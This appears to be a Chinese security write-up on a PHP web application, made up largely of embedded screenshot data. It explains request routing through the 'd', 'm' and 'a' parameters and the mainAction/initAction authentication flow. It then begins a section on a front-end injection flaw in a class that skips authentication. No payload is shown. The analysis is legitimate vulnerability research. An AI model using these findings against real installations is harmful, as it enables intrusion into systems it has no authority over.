QCAQCAQCYcrhHhI6315Yf5/GMJ1DEYdAIBAIhIlEMD/2XovgYkTXGu+1CNMZMqNDIBAIBMI94/mNaTu2v3qvpZjO0D0wkDDB6PX9WD8AQF4+cG9BDMYMxJhxr8UgEAgEgpNMtKGDeWuKll7Y/rFygsudnNjUBsb6gbs6wPp7JxfBjH6wDzHc3dy9ECLTn3bB+uDULavhs3+ckNjYpEYdOqUhAxphwpjG/Wi8Gd3YjfU/2xr5UmXkw2F62zMNeObDWyNfqlz0cuWilysjMx+daRUN89a8V5IZOgZxMd/LPcUL8Uc3z4H5Pp7v8ry/5Xt/y/d6d577KJOPEXsy29PG4EAPsXImFVg/MDhw29Z1399/k/DFuwE8O91hmuGovvGbSrbm8uypgjrUVMSU6uAUAxppG5M5ZxyI4hJQQOB4/TQYo9xC952FjIDRv3pvbL2MYJvRP6TOApjly7MVgmc+/GHUfyyBCzuu7P9N65H9mlbJLYtQ3pr3SjKDz33wm7E8/XBmz9zs58EZRQrM95m928cduu+8oux9q/Nu7a1Bi1cXYb2X5zc8r2/muY/feGRLZnva0OvvYv3geElCcBas7wcYaX3eUSgBFH0Sxn3ygGW3voihrNpefEAZ8ETJb1aM6ErUoVZMnQ7uaEAjbWPy5hwYz3g6hxHnquxs4gfgB/7OpHSylxEoGN3SFWL8tLXuJwAAW21uvm9YKKj3S84ev4Pgzo1WjTka1gdveC0zWFnxyvYfbKbF+geLvnk2UVnxyotfiV3aVRjLZjOg/+5O9YAYgbi/f6TwSgC4O5HGBYU2sH5gAgWxDcZBSzJ/xlJeqmjSTc4M7wl6/QCD4UEnJk7hl232Nf+puH1+v+Sv1cY5IV5u1K4nZtkLBQDMDyh8PfChEAQASoX6wE7RKbG5kWD9rGfei1wXYupZ+PbB/CufiJHhWbDwEO8h6xMOlQeaX9lnzpyXwn812yc4BFkWPUxgc1kWmTsEMZQfvfhB6DfPbtry0Im/nB9V6Fi4Jx3c4YBmN+F92TbuNxDC+14dMHxzcc7j1o+mNxPlo7Ni9X+GoNpdjowYhcq1Vo5DEKO378XePjum23hBpY3JYaezmOBarwOXZzj
<p blockindex=4>然后通过请求参数中的 <code>d</code><code>m</code><code>a</code> 定位到具体的 <code>action</code> 中的方法进行调到</p>
<p blockindex=5><img src=data:image/png;base64,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
<p blockindex=6><code>d=systam&amp;m=admin|admin&amp;a=login</code> 相当于调用 <code>webmain/system/admin/adminAction.php#login()</code></p>
<p blockindex=7>而所有的 action 都会继承 <code>mainAction</code>,当我们请求某个 action 时首先会调用父类 <code>mainAction</code><code>__construct</code>,进行初始化的一些操作</p>
<p blockindex=8><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAxIAAAHCCAIAAAD0B2iaAAAgAElEQVR4nOzde1gTV9448O8Bq67KtVq1Qq60wW5VqL2CEqKCVHxrdds18AJNqlDdfavpb7tbWGDVEhbd3T5Cu12vFaqu4Nst2F1R5NIAAm3fqoDulsQmIQG8tUq4WrXK+f0xAQIECBAgod/P0+epZGbOnJk5k/nmnDPnEO8nngWEEEIIITQYh/HOAEIIIYSQfcCwCSGEEELIIhg2IYQQQghZBMMmhBBCCCGLYNiEEEIIIWQRDJsQQgghhCyCYRNCCCGEkEUwbEIIIYQQsohdhk0vv7RsvLOAEEIIoZ+cSeOy10HjnhP//Lxrza5/I4QQQgiNo/EJm0wDo76xkWlQdeKfn2PkhBBCCCFbMPywiTpxgwI5Mwjp+qTt8peFyttWylg305qnrg+7/o0RFUIIIYTGxghrm35QnbvY0Gr8o7XVyjFTr3ombLlDCCGE0DgacSNda3trK7Fgvd56dW8y29sJW+gQQgghZDtGGDb9bN4zLwhmTAOAtuv//uqrG63E0hDK8r5NI8shQgghhJB1jCRsar9yQ9dSc6MFAJz4y59+8rn5baPRt4kJqgaoncLQCiGEEEJjYPhhE2n9rub/Ov9ovfT1ddHTj852qtFaWOFkSSOdKezYhBBCCKHxZdUBCKbPcAZotWBFyxvpMEhCCCGEkI2wzijhlE5zngHQ3tZileT6ZxpF4VjhCCGEEBpLww+b5j37/IpnufOcpjk5TfOYv1Awg1xXWtRCZ3kFUt9aqF7jEWDkhBBCCKExM/xGuoYarfN83jMiLgDQttuqc1/WXB3OSAQWYiKkvnEStuIhhBBCaGwQ7yeeHcv9DRzlDGPsbwybEEIIITQ2xjpsQgghhBCyU9bpEo4QQgghNOFh2IQQQgghZBEMmxBCCCGELIJhE0IIIYSQRTBsQgghhBCyyCQPT6/xzgOyOTyvBeOdhQlCq7403llACCFkNVjbhBBCCCFkEQybEEIIIYQsgmETQmOHctbER8zr/WHHvMC4NwI5dJwyhRBCyFLDn5NuJOjUx1ZMAd3dy5o7vaexo1OfS5//tCczJTBtzKr5+0d91gEA2vHYjieC/eHcpm++1DhYeS48OvW5HZyn/acRAIDb6p2600Xm8jCWRvV40dignDX7UkPgH+fMLfT5Tep2lmz7YR1eXIQQsl3jEzZ5uT0TOweyai5r+iwid75KrtEAAMctOHbOgKn8DADcOAB9ExkJY9z2w7md32h0U9wCp4Hutm3Uyo3O8aKxwcRM87469F9Hr/RaRByuKJLlrD0Jr6ZuqntpbzGGxQghZKvGJ2wamObOzUHXIQ7fbq/8FgDA2s8YLze+JxiydF8W3SFw56am2fq76It2zNz4xHpx/5VJo3e8EwylD9rjbrfD5IdTJk8iY3euBt4v7Zj32m9D5l3J25L8f2avIHG48vHmQ57/fP038c8Wp3w9VrlGCCE0NLZQi4LQRBe4+pce5MvjJ2r7j3qJw9fH/nEdnlsVhZ2cEELIVg2/tok/N3zvnMadNZqlnGD/aQRoY7k2f3vzTZOl0NUzibqEFPK9yjUfbG82eWxMeXy7uW0HRjse27E42H/Azk/8uSHxc/hMB6l6w5lkzeWR9wca+Ii6zgaH84x4mjvQxvLr+duv3eyZgplcGeuZmH5U8Mzep58BADCcCar91sLjpVMf28GcRoD621//nakn687zILkaPfdf/KEp6H4HIQDgcHGK66FJXdUwdO6Pza/duTebAIDDjYdmfDx56jXSuVX7rSAHlz9Puv/avduzKaVkSsFU19OO3cc7927za/eYbekNMuXMVNdKx676ntuzCQAh8GNj6o8AQC9OmZ3+kHFD3x++j3pAKZn+52nT4R6TCL3xEFM/dP/F9ltBMP3P02ZcI10rTz483bWSDHxEg+4XAET+PpRWlhcP8jtFW1Z15ZUQvyUeh3W9G/IQQgjZgpE10hGvWI57+bXjm+66RXKC/XnBG/rpwW1uW3cx75ly7ZC3JQ7fbqsxePXf+Wk599exbqT+2plNBgNnCn/p3GcCp13W3Bk8R/y54XvnujP/Fj/xphgAqHrn+dNFFoZczNlo/nqTDgI5weI5wRsM3UfUX66Iw82DuuPF4BbICRbDuZ06jQ4Abn/f1ZQz8PHSjsd2zA/2/0Gz85tzuin8SN7TsfPdwDTPA+Zq9NyRtrYsJA75U92rHO7PuX9n5b07j06acQ0AgNIfm3975+53k1z+NHnSnPttkfeaf9sBb02d2hlUEfKg+bWOKdWT3avgzmt32oPutFV1RjNz79767b0Hlya7fDxpEnTc97nftvL+/QsOkwghxHH6x9OmQsed1+60A7MCwFUH6DoTlT9zv/5j22/v3Pe5dyvo/qQj06b53G4HBwvb8vo7okH3SzvmsTwAvroweKcl7bmKKyGvej4KgGETQgjZopGFTbQxS8c8g29u07mnz3/a323WRxZWZnRXnAx5W3LnZn/dounU5/7bFeqvZb1+7SbTTaqo+SsAi56L6iv5mwzG6CRLm198FwC+H0I1FW0sv/Z3pvJJfY0v5nt5TgG4M3iuyJ2b6g4IBAAA3e3vNQ6kV/eXAY7Xa94z/mDIYt71u3NzWw2kz3/6v+fNKuo6k/3navTQuXfbFoBD/s9mnnYEgEnXHKdWTula+mDVvbvgMP3jqVOvEbjm6HIdbv32XtuqjqmdVUqUkilnpjHVPNPP3L8d9eD+HIBrAAAwp6ODkClVTO2U46RrD0093X15yTVHx84GrklXHSYR0uvKO14FALgX/CNTjXTHxzpHNNh+H/WcB9Bg8enzeJTbQQdozkMIITRerNe36XZjHYDnVLex3rYnpkN3ueH7YWxLHG5q7tzUMX/c/V5z52bf8REGVn/X+rkaAO2YGejiBj9oim93fmTuTPaXq9HzwOf+A3CYWmWmdFH64M6iDvhu0tSrnR9ddZgE8GBOh+lqk673k/SFSZMpvRt5+6b07p25w+wDRG88NOMCAMCUQ9MePmTRL4cBjgghhNBPh428SWeo/wFgiju/g+KgRGgAhDzk8meHuyF32hbca1n4YzMlU44Y+zZZzrHa2MuKEEcbuQEQQgjZBRv59ezm+TOAu40YM6FBkWuOU9Onz/x/TrP+NGX6dx13I++0Dbfaaaxcrb9ibHobbE2mOe8qttAhhJBtsl7YNM2dBVB/xzDW2/akNmjqwc3fbdbIk7KiUcoVcbipuwvwM37gtM6PprmzAMobL1t3R0PlWDXJETru+HT0XUSI46QbAI/cv/No50ePdtwHmFI15Hofcu2h6WcmEULvDzwsqjUMcESDIg5Xzn5xHeb5LOUNtmrgUy8Q8mX5/w0vkwghhEbbyMIm4i7mvLjBZSbf5bkdnKc9QfP3K8buO+rbjUDcmUCB7/JcOo9v+bbGFJhQY+7j/Kkzl899jG/yS50/dSZ/6kwO88eUWfypM7uWkjtf/b0JPOeKD819jD91Jt/lue3e4RumWqE2YvAj6t+guSION4ubDTDtmch5s/hTZy6f+9zyqRYdb+G1c/XgJua8uHzqTL7LczvmP+0JmrNWiD9HhFybMuMSdAT/cPPFH+/PfXDf925TbHtXndCUvMmO0NH+2p07cx/c973b/Nt7D2DS1AsWpXxH2n4j9oc2X2OytyLvU+poui0hjlOrHcjsH9tWddyf++DOiz26QD0wxmod9+c+6JWy43UHQigTGDEpW35Eg+5XW1Z1Beb4LfEY+Oi6xylACCFkk0b6Jl15M/jz1osJgdvqrJru995Jc95OQ3jsXHHBXKi/rf679tx/857uua0665r5bY0p3Pkq+bpb/JzgvW4EqDrLYBxEgE59Lr5r0joAMV8shu6X1ACgUHMc5j3933OC984lQBvrm74+MqKD7MzPoEc0oEFzpb6Sv3NqcOxcsf9cgNuNWbc1cOfmoMdL7nwlrYEdnKdjn/ACgHrD15s0NjFp3ZRD05xX3WsLutMYTCgljpcmz+hcRK5NefjP0Pz
<p blockindex=9>其中我们发现有关鉴权的处理被子类的 <code>initAction</code> 所实现,比如 apiAction 中</p>
<p blockindex=10><img src=data:image/png;base64,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
<h2 blockindex=11>0x02 前台注入</h2>
<h3 blockindex=12>2.1 代码分析</h3>
<p blockindex=13>在查看 initAction 的实现时发现有个类实现该方法未存在鉴权</p>
<p blockindex=14><img src="data:image/png;base64,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